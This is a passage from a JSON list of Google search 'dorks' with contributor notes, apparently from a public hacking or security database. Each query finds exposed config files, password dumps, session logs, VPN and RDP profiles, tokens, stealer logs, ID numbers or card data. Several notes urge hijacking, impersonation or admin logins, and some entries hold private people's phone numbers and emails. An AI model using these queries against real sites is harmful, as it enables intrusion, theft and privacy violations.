Vitae which can therefore be used in a Social\nEngineering based vector attack\n-- \nTrevor Starick"}, {"dork": "site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "description": "Searches StashBox for publicly avaliable PDF's or .doc files\ncontaining information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack\n--\nTrevor Starick"}, {"dork": "inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "description": "iphone apple push notification system private keys, frequently unencrypted,\nfrequently with DeviceIDs in same dir"}, {"dork": "inurl:server-info intitle:\"Server Information\" Apache Server Information", "description": "Juicy information about the apache server installation in the website.\n-- \n*Regards,\nFady Mohammed Osman.*"}, {"dork": "filetype:pem \"Microsoft\"", "description": "Microsoft private keys, frequently used for servers with UserID on the same\npage.\n--\nShamanoid"}, {"dork": "+intext:\"AWSTATS DATA FILE\" filetype:txt", "description": "Shows data downloads containing statistics on the site.Made by AwstatsThe best dork for that system.By: 67pc"}, {"dork": "inurl:\"trace.axd\" ext:axd \"Application Trace\"", "description": "example google dork to find trace.axd, a file used for debugging asp that\nreveals full http request details like cookie and other data that in many\ncases can be used to hijack user-sessions, display plain-text\nusernames/passwords and also serverinfo like pathnames\nsecond with plain-text usernames and passwords along with sessiondata. this\nfile should be developer-only and not publicly available but seems to be\nused quite often, usually hidden from google with robots.txt. Author: easypwn"}, {"dork": "inurl:\"/includes/config.php\"", "description": "The Dork Allows you to get data base information from config files. Author: XeNon"}, {"dork": "intitle:index.of? configuration.php.zip", "description": "this dork finds mostly backed up configuration.php files.\nIts possible to change the *.zip to *.txt or other file types.\nAuthor: Lord.TMR"}, {"dork": "filetype:old (define)(DB_USER|DB_PASS|DB_NAME)", "description": "this dork locates backed up config files\nfiletype:php~ (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:inc~ (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:inc (define)(DB_USER|DB_PASS|DB_NAME)\nfiletype:bak (define)(DB_USER|DB_PASS|DB_NAME)\n \nAuthor: Gerald J. Pottier III"}, {"dork": "filetype:old (mysql_connect) ()", "description": "There are three of mysql_connects but that all search in .inc or\nwarnings, non search for .old . Dot old is something that all devs to\nto hide old files they do not want to delete immediatly but almost\nalways forget to delete. The server lang can be changed.\n:D\n-- \nGerald J. Pottier III\nSenior Managed Systems Engineer :STG inc.\nHereford, AZ 85615\n[Home] 520.843.0135\n[Work] 520.538.9684"}, {"dork": "Google Dork For Social Security Number ( In Spain and Argentina is D.N.I )", "description": "This dork locates social security numbers. Author: Luciano UNLP"}, {"dork": "List of Phone Numbers (In XLS File ) allinurl:telefonos filetype:xls", "description": "This is a dork for a list of Phone Private Numbers in Argentina. Author: Luciano UNLP"}, {"dork": "allintext:D.N.I filetype:xls", "description": "This Query contains sensitive data (D.N.I ;-) ) in a xls format (excel) and D.N.I for People of the Anses !\nAuthor: Luciano UNLP"}, {"dork": "intext:\"Thank you for your purchase/trial of ALWIL Software products.:\"", "description": "This dork can fetch you Avast product licenses especially Avast Antiviruses\n, including Professional editions ;)\nAuthor: gr00ve_hack3r\nwww.gr00ve-hack3r.com"}, {"dork": "filetype:docx Domain Registrar $user $pass", "description": "Dork :- *filetype:docx Domain Registrar $user $pass*\nUse :- *To find domain login password for Registrar (can Hijack Domain)\nSubmitted by : G00g!3 W@rr!0r\n*"}, {"dork": "inurl:.com/configuration.php-dist", "description": "Finds the configuration files of the PHP Database on the server.\nBy\nChintan GurjarRahul Tygi"}, {"dork": "inurl:newsnab/www/ automated.config.php", "description": "Usenet Accounts from Newsnab configs\ninurl:newsnab/www/ automated.config.php\nAuthor: rmccurdy.com\nyay free newsgroup access !\n***********************************************************************\nThe information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter.\n***********************************************************************"}, {"dork": "runtimevar softwareVersion=", "description": "Hits: 807\nConfig file from Thomson home routers, sometimes it contains password's and\nuser's encrypted\nContains ACS servers info from ISP's"}, {"dork": "ext:gnucash", "description": "*Google Search:*\nhttp://www.google.com/search?q=ext:gnucash\n*Description:*\nFind Gnucash Databases containing juicy info.\n*Author:*\nhttp://la.usch.io\nhttps://www.twitter.com/la_usch\n--------------------------------------------------------\nCheers\nL@usch\nWeb: http://la.usch.io\nTwitter: https://www.twitter.com/la_usch"}, {"dork": "filetype:ini \"This is the default settings file for new PHP installations\"", "description": "Finds PHP configuration files (php.ini) that have been placed in indexed\nfolders. Php.ini defines a PHP installation's behavior, including magic\nquotes, register globals, and remote file operations. This can be useful\nfor knowing which attacks (such as RFI) are possible against the server.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "description": "Tries to reduce false positive results from similar dorks. Finds pages\ncontaining output from phpinfo(). This function is used to debug and test\nPHP installations by listing versions, extensions, configurations, server\ninformation, file system information, and execution environment. The output\nof this function should not be included in production environments and\ncertain versions of this function are vulnerable to reflected XSS attacks.\n- Andy G - twitter.com/vxhex"}, {"dork": "allintext: /iissamples/default/", "description": "Searching for \"allintext: /iissamples/default/\" may provide interesting\ninformation about a mis-configured .asp server including raw source code\nfor asp, directory structure and the IIS version ( especially useful when\nIIS is running on NT 4.0)\nthe result provides a way to further explore directory structure for juicy\ninfo.\nOleg."}, {"dork": "inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "description": "zendesk is good ticketing system . It has thousands of clients. with the\nabove dork you can see the clients internal file attachments of the\ntickets .\nThese file can be opened by anyone because they are not maintaining any\nauthentication token for this attachments\nInternal source codes, doubts, ip's , passwords, can be disclosed in the\nattachments"}, {"dork": "inurl:fluidgalleries/dat/login.dat", "description": "Works with every single fluidgalleries portofolio sites. Just decrypt the MD5 hash and login onto url.extension/admin.php with the username from the search result and with the decrypted MD5 hash. Dork by Kraze (kraze@programmer.net)"}, {"dork": "inurl:wp-content/uploads/dump.sql", "description": "This is *Mohan Pendyala* (penetration tester) from india.\nGoogle Dork: *inurl:wp-content/uploads/dump.sql*\n*\n*\nThe *Dump.sql* file reveals total info about the database tables, Users,\npasswords..etc"}, {"dork": "intitle:\"WAMPSERVER Homepage\" & intext:\"Server Configuration\"", "description": "#Summary: Wampserver Homepage free access (*http://www.wampserver.com/).*\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:~~joomla3.txt filetype:txt", "description": "By this dork you can find juicy information joomla configuration files\nAuthor: Un0wn_X"}, {"dork": "filetype:txt inurl:wp-config.txt", "description": "Easily hunt the Wordpress configuration file in of remote web sites\nAuthor : Un0wn_X"}, {"dork": "filetype:txt inurl:~~Wordpress2.txt", "description": "This dork can be used to find symlinked Wordpress configuration files of\nother web sites"}, {"dork": "inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "description": "Find FTP logins and full path disclosures pushed to github\ninurl:github.com intext:sftp-conf.json +intext:/wp-content/\n--\nRogueCoder"}, {"dork": "filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "description": "Project Honey Pot anti-spammer detection (http://www.projecthoneypot.org/)\nCan identify the honeypot and get the site's honeypot keys\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "description": "Git config file\nEasy way to find Git Repositories\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:/wp-content/uploads/ filetype:sql", "description": "Google dork for WordPress database backup file (sql):\ninurl:/wp-content/uploads/ filetype:sql\nBy sm0k3 (http://sm0k3.net - Sm0k3 HQ)\n_________________\nWith regards,\nsm0k3\nAny questions: info@sm0k3.net\nAdministration issues: admin@sm0k3.net\nWant to submit an order: submit@sm0k3.net\nJabber: sm0k3@im.sm0k3.net\nBlog: http://sm0k3.net"}, {"dork": "filetype:bak (inurl:php | inurl:asp | inurl:rb)", "description": "This one could be used to find all sorts of backup data, but this example\nis limited to just common webapp extensions\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:tar filetype:gz", "description": "Tar files\nContain user and group information (in addition to potentially useful files)\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "description": "JBoss\nhttp://docs.jboss.org/jbossas/docs/Server_Configuration_Guide/4/html/Connecting_to_the_JMX_Server-Inspecting_the_Server___the_JMX_Console_Web_Application.html\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "filetype:xml inurl:sitemap", "description": "Sitemaps, the opposite of Web Robots Exclusion\nDetail directory and page map\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:mikrotik filetype:backup", "description": "mikrotik url backups uploaded..\nthen.. credentials cracked via http://mikrotikpasswordrecovery.com\nBest Regards,\nkn0wl13dg3 - underc0de team.- www.underc0de.org\nkn0w13dg3.blogspot.com"}, {"dork": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "description": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github\nHow This Work?\nThis dork will searches databases phpMyAdmin. Searches only sql formats and founds admin username and passwords to use this information to login as administrator\nSorry for my english. I'm not a native speaker"}, {"dork": "inurl:crossdomain filetype:xml intext:allow-access-from", "description": "Locates crossdomain.xml files used by flash/flex/silverlight to\ndetermine the cross domain policy of that site's\nflash/flex/silverlight apps. An open setting of will allow a weaponized flash application hosted on an\nattacker's site to read information from the target site while running\nin a victim's browser.\n-- \nGoogle+ http://google.com/+EricGragsone\nRed Team http://www.crimsonagents.com/\nBlue Team http://www.erisresearch.org/\nCoding http://maetrics.github.io"}, {"dork": "inurl:clientaccesspolicy filetype:xml intext:allow-from", "description": "Locates clientaccesspolicy.xml files used by silverlight to determine\nthe cross domain policy of that site's silverlight apps. An open\nsetting of will allow a weaponized silverlight\napplication hosted on an attacker's site to read information from the\ntarget site while running in a victim's browser.\n-- \nGoogle+ http://google.com/+EricGragsone\nRed Team http://www.crimsonagents.com/\nBlue Team http://www.erisresearch.org/\nCoding http://maetrics.github.io"}, {"dork": "(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "description": "Files with information DMZ, public IP, private IP network segments, etc.\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "filetype:sql site:com and \"insert into\" admin \"2014\"", "description": "filetype:sql site:com and \"insert into\" admin \"2014\""}, {"dork": "intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "description": "Looks for text files with SHA1 of \"password\". These could be tips (not very useful), config files, other peoples wordlist dumps, etc"}, {"dork": "filetype:log intext:org.apache.hadoop.hdfs", "description": "Dork : filetype:log intext:org.apache.hadoop.hdfs\nList of Log files which contain details about internal and External ip in\nHadoop Grid\n.This Log Files generated after every batch process.\n-- \nSimmant Yadav"}, {"dork": "inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "description": "Files found with this google dork will show juicy information about a\nmigration of a complete wordpress site, including the location of a .zip\nfile where the complete site is stored including \"wp-config.php\",\n\".htaccess\" and other interesting private files.\nThis file is the result of a migration with the Wordpress plugin\n\"Duplicator\".\nAuthor: @felmoltor"}, {"dork": "inurl:\"/server-info\" intext:\"Loaded Modules\"", "description": "Search Apache server information though default module info_module:\ninurl:\"/server-info\" intext:\"Loaded Modules\"\nAuthor: @felmoltor\n-- \nFelipe Molina de la Torre"}, {"dork": "filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "description": "Hi,\nThis google dork to find sensitive and interesting information under\nWEB-INF directory via ftp protocol, for example:\n* Website map\n* Sensitive information (user name and password for webdave)\n* Deployment descriptor in java (web.xml)\n* Servlet mapping url pattern\nKeyword:\nfiletype:xml inurl:/WEB-INF/ inurl:ftp:// -www\n-- \nFahad Altamimi"}, {"dork": "intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "description": "Google dork to find session IDs and potentially impersonate users:\nintext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log\nRegards,\nGabor Szathmari"}, {"dork": "intitle:\"index of\" \"archive.pst\" -contrib", "description": "Google Dork: intitle:\"index of\" \"archive.pst\" -contrib\nAuthor: Sphearis\nThis dork allows you to see Outlook archive files stored in the open. These\nfiles can be opened with a simple .pst viewer to read all emails it\ncontains.\nThe \"-contrib\" has been added to filter Cran installations which uses a\ndirectory structure similar to the search terms."}, {"dork": "inurl:/dbg-wizard.php", "description": "# Exploit Title: Nusphere PHP DBG wizard\n# Date: 02-06-2015\n# Vendor Homepage: http://www.nusphere.com\n# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm\n# Version: any\n# Exploit Author: Alfred Armstrong\n# Contact: http://twitter.com/alfaguru\n# Website: http://figure-w.co.uk\nDBG Wizard is meant to be used with the DBG PHP debugger as an aid to\nconfiguring it correctly. It is supplied as a PHP script called\ndbg-wizard.php which when placed in the root folder of a web site and\nexecuted provides instructions to the user about setting up their web\nserver so the debugger can be used.\nIt is not meant to be present on a live site as it exposes details\nabout software configurations and versions which might allow an\nattacker to discover other vulnerabilities. If the DBG shared library\nis also installed it will expose that fact and potentially assist an\nattacker in crafting a request to start a debug session in which they\ncould do anything that can be done through a PHP script, including\nreading files and accessing database entries.\n--\nAlfred Armstrong"}, {"dork": "intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "description": "This Dork reveal the folders of \"Inbox\" and \"Sent\" for mail servers. Enjoy."}, {"dork": "filetype:pcf vpn OR Group", "description": "Google Dork: filetype:pcf vpn OR Group\nAuthor: azupwn\nThis dork allows you to search for publicly accessible profile\nconfiguration files (.pcf) used by VPN clients. These files typically\ncontain usernames, password, tunneling ports, VPN server information and\nother information.\nCheers,\n-- \nazupwn"}, {"dork": "intitle:\"index of\" \"fic\" \"ndx\"", "description": "# Exploit Title: intitle:\"index of\" \"fic\" \"ndx\"\n# Google Dork: intitle:\"index of\" \"fic\" \"ndx\"\n# Date: 10/06/2015\n# Exploit Author: Sphearis\nThis dork allows you to look for Hyperfile databases(.FIC) stored in the\nopen. You can simply read them in a text editor(You'll see the header and\nthen the database content in plain text) or you can convert them(to xml,\nexcel, ...) with free software. In order to convert them, you also need the\nlinked index file (.NDX) and optional mmo file which are located in the\nsame directory.\nSome Windev/Webdev installations store usernames and other sensitive\ninformation in that kind of file."}, {"dork": "\"signons.sqlite\" intitle:\"index of\"", "description": "\"signons.sqlite\" intitle:\"index of\"\nThis dork finds firefox profiles and other softwares that use the similar\nformat that you can grab and put in your own firefox or other installation\nand reveal all passwords saved, history, bookmarks, saved cookies and\npretty much everything! When you get hacked using this method it feels like\nyou are getting hacked by a whole team.\nby _sNapper\n-- \n\"The answer to every problem is One.\" -- Myself\n--\n\"Life is like war, for the most part--planning it is useless.\" -- Myself"}, {"dork": "phpMyAdmin SQL Dump", "description": "# Exploit Title: [phpMyAdmin SQL Dump]\n# Google Dork: [intext:SET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\"; = ext:txt]\n# Date: [6/29/2015]\n# Exploit Author: [Daz Holmes]"}, {"dork": "inurl:access.cnf ext:cnf", "description": "File vulnerability, reveals the path of Password Server. Have fun.\nThis Dork is present By Rootkit."}, {"dork": "intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "description": "Google dork Description: MySQL dumpGoogle search: intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt\nby TN-N3SQU1K :)"}, {"dork": "inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "description": "The dork 'inurl:wp-admin/admin-ajax.php inurl:wp-config.php' finds the\n'wp-config.php' file. It contains information about the database,\nincluding the name, host (typically localhost), username, and password.\nThis information allows WordPress to communicate with the database to store\nand retrieve data (e.g. Posts, Users, Settings, etc).\nName: Suyog Pawar."}, {"dork": "intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "description": "Files containing Juicy information from web online tools for generating .htpasswd and giving full web path .\nby - l1kw1d"}, {"dork": "intext:/homedir/.cpanel-datastore/", "description": "intext:/homedir/.cpanel-datastore dork displays publicly accessible and\nindexed cpanel datastores.\nEnjoy, Zapperlink"}, {"dork": "filetype:pac inurl:\"/proxy\"", "description": "Search the Web Proxy Autodiscovery Protocol\nIng. Daniel Maldonadohttp://www.caceriadespammers.com.ar"}, {"dork": "inurl: mil|/issue.php filetype:xls", "description": "Files containing juicy info of the involved current issuers\nAuthor : aye_robot"}, {"dork": "inurl:xampp inurl:perlinfo.pl ext:pl", "description": "Panels with a lot of data for webservers.\nDork by Rootkit Pentester."}, {"dork": "site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "description": "Dork :\nsite:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup\nThis Will help to grab the Backup and old file of the (.gov and .edu)\nWebsite's\nBy : Mishra Dhiraj (D)"}, {"dork": "site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "description": "Dork;\nsite:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini\nThis dork will search for any configuration files a target or targets may\nhave.\nYou can change in site:target.com - to target:edu (for education targets)\nBy Kevin Mark"}, {"dork": "site:ws.kik.com | site:ws2.kik.com k=", "description": "Google Dork: site:ws.kik.com | site:ws2.kik.com k=\nDate: September 16th, 2015\nExploit Author: Matthew Blankenship\nDescription: Shows usernames, emails, and verification tokens for kik messenger accounts."}, {"dork": "inurl:\"trace\" ext:axd intext:\"password\"", "description": "the dork keyword is:\ninurl:\"trace\" ext:axd intext:\"password\"\npurpose of dork:\nsearch for tracing files in the ASP.NET websites which might contain a\nsensitive information such as the username and password entered to the\napplication.\ndiscovered by: Asem Al Husaini (SFDA)"}, {"dork": "inurl:\"server-status\" intext:\"Apache Server Status\"", "description": "Files containing juicy info\nThe Status module allows a server administrator to find out how well\ntheir server is performing. A HTML page is presented that gives the\ncurrent server statistics in an easily readable form. If required this\npage can be made to automatically refresh (given a compatible\nbrowser). Another page gives a simple machine-readable list of the\ncurrent server state.\nThe details given are:\nThe number of worker serving requests\nThe number of idle worker\nThe status of each worker, the number of requests that worker has\nperformed and the total number of bytes served by the worker (*)\nA total number of accesses and byte count served (*)\nThe time the server was started/restarted and the time it has been running for\nAverages giving the number of requests per second, the number of bytes\nserved per second and the average number of bytes per request (*)\nThe current percentage CPU used by each worker and in total by Apache (*)\nThe current hosts and requests being processed (*)\n-- \nAshish Kumar Sahu"}, {"dork": "\"Stats generated by pisg v0.73\"", "description": "Dork with Stats for irc channels.\nDiscovered by Rootkit Pentester."}, {"dork": "intext:\"Microsoft(R) Server Maintenance Utility (Unicode)\" ext:txt", "description": "Details:\nSearch result shows Txt files. Text files contains database information+server path disclosure+different db queries. \n(\u00af`\u00b7._.\u00b7[ Silent_Z3R0 ]\u00b7._.\u00b7\u00b4\u00af)(\u00af`\u00b7._.\u00b7[ Pak Cyber Army ]\u00b7._.\u00b7\u00b4\u00af)"}, {"dork": "intitle:\"TurnKey LAMP\" intext:\"turnkey lamp release notes\" \"Apache PHP information\"", "description": "Detail:\n Google results shows turnkey lamp default page which discloses information server like PHPINFO page, Apache server Status, webmin login page and many more.\n[ Silent Z3R0 ]-[Pakistan Cyber Army]"}, {"dork": "inurl:\"sugarcrm.log\" ext:log -git -google", "description": "Description: SugarCRM log files\nGoogle search: inurl:\"sugarcrm.log\" ext:log -git -google\nAuthor: nebo_oben"}, {"dork": "filetype:rcf inurl:vpn", "description": "Sonicwall Global VPN Client files containing sensitive information and login"}, {"dork": "intitle:\"Skipfish . scan\"", "description": "Google Dork: intitle:\"Skipfish . scan\"\nURL: http://www.google.com/search?q=intitle:%22Skipfish+.+scan%22\nDescription: Skipfish Vulnerability Scan Report\nAuthor: Andrea (aka theMiddle) Menin\n-theMiddle"}, {"dork": "filetype:pdf intitle:\"SSL Report\"", "description": "These dork show Qualys SSL Reports Hosts.\nEnjoy with them.\nRegards.\nRootkit Pentester."}, {"dork": "site:github.com filetype:md | filetype:js | filetype:txt \"xoxp-\"", "description": "Slack auth tokens used by \"chatops\" bot developers mistakenly disclosed on github.com:\nsite:github.com filetype:md | filetype:js | filetype:txt \"xoxp-\"\n-- \nNicholas Hinsch"}, {"dork": "index of /wp-content/uploads/userpro", "description": "Alot of juicy info found, some csv files found that had alot of personal\ninformation.\nSometimes if you type ConversationUnread you can get the same results.\nstag_1"}, {"dork": "intext:\"/LM/W3SVC/\" ext:asp", "description": "intext:\"/LM/W3SVC/\" ext:asp\nServerVariables that give information.\n-Xploit"}, {"dork": "intext:\"/showme.asp\" HTTP_ACCEPT", "description": "intext:\"/showme.asp\" HTTP_ACCEPT\nApplication & Session Contents for Servers.\n-Xploit"}, {"dork": "filetype:sql intext:wp_users phpmyadmin", "description": "# Exploit Title: (Google Dork) filetype:sql intext:wp_users phpmyadmin\n# Google Dork: filetype:sql intext:wp_users phpmyadmin\n# Date: 2016-07-06\n# Exploit Author: RuBiQc\nDescription: Finds SQL dump files of Wordpress sites with usernames and \npasswords. Pretty funny that people make these publicly available!"}, {"dork": "inurl:DiGIR.php", "description": "# Exploit Title: (Google Dork) inurl:DiGIR.php\n# Google Dork: inurl:DiGIR.php\n# Date: 7-7-2016\n# Exploit Author: fnkym0nky\nDescription: Finds files that contain diagnostic issues for SQL databases,\nPHP code, among other things. Able to be used in tandem with Error Based\nSQLi, and vulnerability enumeration"}, {"dork": "inurl:wp-content/debug.log", "description": "According to the Wordpress docs at\nhttps://codex.wordpress.org/Debugging_in_WordPress the option exists\nto enable a debug log for a number of actions in Wordpress. In true\nWordpress style, this file is dropped into a web-readable directly,\nwith no consideration for who may be able to read the file.\nBeing a debug log, as you would expect this file can include full SQL\nqueries, full file paths, usernames, passwords and all other other\ndetail you'd expect in a debug log!\nOf course, Google has picked up a number of these files, and I'm sure\nthere are many more just a quick scan away probably only protected by\nrobots.txt files.\nGHDB Entry: https://google.com/search?q=inurl:wp-content/debug.log\nJames"}, {"dork": "inurl:log -intext:log ext:log inurl:wp-", "description": "All kinds of juicy log information that can be picked up on wordpress sites\nranging from php_errors.log to WS_FTP.log and more. Use inurl:edu or\ninurl:gov etc. at the end to specify by which domains you want to filter\ndown and view information about.\nAyushman Dutta\nUniversity of Houston"}, {"dork": "(@gmail.com || @yahoo.com || @hotmail.com) ext:php inurl:compose", "description": "Names of mail accounts and other data of webmail servers.\nEnjoy Healthy.\nDork by Rootkit Pentester."}, {"dork": "inurl:calendar.google.com/calendar/embed?src=", "description": "This will bring up publicly available Google Calendars. For example, using\nthis dork you can find:\n - https://calendar.google.com/calendar/embed?src=safekprocess@gmail.com\n - https://calendar.google.com/calendar/embed?src=chris.hm.chan@gmail.com\n - https://calendar.google.com/calendar/embed?src=kchan9@gmail.com"}, {"dork": "\"[HKEY_CURRENT_USER\\Software\\sota\\FFFTP]\" filetype:reg", "description": "This finds some files with juicy information about Windows servers.\nDork: \"[HKEY_CURRENT_USER\\Software\\sota\\FFFTP]\" filetype:reg\n-Gee"}, {"dork": "\"PHP Version\" inurl:/php/phpinfo.php", "description": "This finds pages containing info about the PHP installation and is useful for reconnaissance.\nDork: \"PHP Version\" inurl:/php/phpinfo.php\n-Gee"}, {"dork": "https://paper.dropbox.com inurl:/doc/", "description": "site:https://notes.dropbox.com inurl:/hp/\nA google dork for Dropbox Paper that will allow us to access\ndocuments of other users and see their email address that they use on\nDropbox.\nhttps://secuna.ph\nhttps://medium.com/@atom\nAllan Jay Dumanhug"}, {"dork": "inurl:ManageFilters.jspa?filterView=popular", "description": "*Summary:*\nA Google dork that gives popular JIRA issue topics, related JIRA usernames\nand JIRA queries.\n*Dork discovered by:*\nCenk Kalpakoglu\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "inurl:\"/debug/default\" intitle:\"Yii Debugger\"", "description": "Yii Debugger PHP Framework Server Information.\nAlso other dorks.\ninurl:\"/debug/default/view?panel=\"\ninurl:\"/debug/default/view?\"\n-Xploit"}, {"dork": "allinurl: drive.google.com/open?id=", "description": "Hi!, i discovered this exploit that gets some juicy documents and data from\nusers shared google drive.\nDon't know if it's already uploaded but of course, the exploit is still\nworking of course,\nCheers.\nNiko Onek"}, {"dork": "inurl:iProber2.php ext:php", "description": "Category:Files Containing Juicy Info\nExploit Author:Amine Sanchez"}, {"dork": "inurl:/o/oauth2 inurl:client_id", "description": "Searching for this will return various Client ID\u2019s used with the authentication process within the OAuth2 protocol.\n- therealjayvi"}, {"dork": "intitle:\"FormAssembly Enterprise :\"", "description": "FormAssembly installation finder. Contains forms organizations use to\ncollect information. Some sensitive. Some random. Enjoy.\nDork Keyword: intitle:\"FormAssembly Enterprise :\"\nVendor Homepage: https://www.formassembly.com/enterprise/\nCategory: Files Containing Juicy Info\n------------ Discovered By: Matt - @novpn --------------"}, {"dork": "httrack inurl:hts-log.txt ext:txt -github.com", "description": "Dork for data of httrack web site copy logs.\nEnjoy.\nDork by Rootkit Pentester."}, {"dork": "filetype:pcmcfg", "description": "Google Dork: filetype:pcmcfg\nAuthor: Tarkan Catal X\nThis dork allows you to search for installation template file used by pulseway application (.pcmcfg). This file contains usernames, passwords (encrypted) and server information.\nPulseway is an remote monitoring and management software www.pulseway.com"}, {"dork": "inurl:\"/attachment/\" ext:log", "description": "Finds web application logs that have LOTS of info ;)\nDxtroyer"}, {"dork": "inurl:\"/phpinfo.php\" \"PHP Version\"", "description": "Finds phpinfo() pages that give you lots of handy info!\nDxtroyer"}, {"dork": "\"PGP SIGNED MESSAGE-----\" inurl:\"md5sums\"", "description": "FInds sums (MD5, SHA1, etc) that people don't want you to see!\nDxtroyer"}, {"dork": "intext:Table structure for table `wp_users` filetype:sql", "description": "Google dork : intext:Table structure for table `wp_users` filetype:sql\nDescription : This google dork can access many website database dump in sql format .\nThis google dork created by SIVABALAN ( DEKINGOFCYBER )"}, {"dork": "\"havij report\" \"Target\" ext:html", "description": "Dork who show the havij sqli injection reports.\nDork by Rootkit Pentester."}, {"dork": "inurl:\"mail\" ext:mai", "description": "Finds private (so to speak) emails sent from servers\nDxtroyer"}, {"dork": "\"LGD_CARDNUM\" ext:log -site:camper.com", "description": "Find partial credit card numbers, bank account info, and more!\nDxtroyer"}, {"dork": "\"[PHPSESSID]\" ext:log", "description": "Looks for logs with session ID's generated by PHP\nDxtroyer"}, {"dork": "\"/wp-admin/admin-ajax\" ext:txt", "description": "Finds robots.txt files, which provide info about the server's more\nsensitive side (Which can't be found with Google)\nDxtroyer"}, {"dork": "\"Scan result of Farbar Recovery Scan Tool\" ext:txt", "description": "Finds logfiles for... Farbar?!? I don't even know. Some cool info, though.\nDxtroyer"}, {"dork": "inurl:\"Makefile.in\" ext:in", "description": "Finds config files with private server information\nDxtroyer"}, {"dork": "inurl:\"/Windows/Cookies/\" ext:txt -git", "description": "Cookies from ALL KINDS of sites. Yum! (Think there's only 3 pages of\nresults? think again!)\nDxtroyer"}, {"dork": "\"screen mode id:\" ext:rdp", "description": "RDP is basically a Windows-sanctioned backdoor. You can use it to access\nsomeones computer remotely. This dork finds files with RDP info and logins!\nDxtroyer"}, {"dork": "inurl:\"/data/urllist.txt\" ext:txt -git", "description": "Finds plaintext sitemaps, containing pages which robots.txt disallows\nDxtroyer"}, {"dork": "\"-- MySQL dump\" ext:sql -git", "description": "Finds MySQL database dumps, sometimes containing usernames, passwords, and\nmore!\nDxtroyer"}, {"dork": "inurl:core.windows.net ext:xlsx", "description": "Google Dork for Azure Blob Container files publically available.\nObviously you can change the file extension or run without the extension howver it yields more precise results :)\nAl"}, {"dork": "\"Operating System Intel Recovery\" ext:txt", "description": "Description: Various stealers logs\nDork: \"Operating System Intel Recovery\" ext:txt\nAuthor: scumsec"}, {"dork": "\"WEB Browser Password Recovery\" ext:txt", "description": "Description: Various stealers logs\nDork: \"WEB Browser Password Recovery\" ext:txt\nAuthor: scumsec"}, {"dork": "\"MiniToolBox by Farbar\" ext:txt", "description": "Finds logs with IP configuration, DNS info, application errors, and more!\nDxtroyer"}, {"dork": "inurl:\"wp-security-audit-log\" ext:log", "description": "Finds Wordpress audit logs containing some interesting info about previous\r\nattempts to audit the site\r\n\r\nDxtroyer"}, {"dork": "inurl:wp-links-opml.php", "description": "A Google dork that gives the information about wordpress opml version\r\n\r\n*Dork discovered by:*\r\nm0be1"}, {"dork": "inurl:\"/horde/test.php\"", "description": "Exploit Title:horde php information disclosure\r\n\r\nGoogle Dork:inurl:\"/horde/test.php\"\r\n\r\ndate:11/14/2017\r\n\r\nExploit Author:Cameron Maerz\r\n\r\nVendor Homepage: https://www.horde.org"}, {"dork": "\"-- Dumping data for table\" ext:sql", "description": "This dork will return database backups.\r\n\r\nBy: A1anoud Altoraif."}, {"dork": "intext:\"softperms.txt\" ext:TXT", "description": "When you dork with this,it will generate juicy information that may lead to\r\nparent directory , for best practice filter according to the country .\r\n\r\n\r\nRegards\r\n\r\nFu2x2000"}, 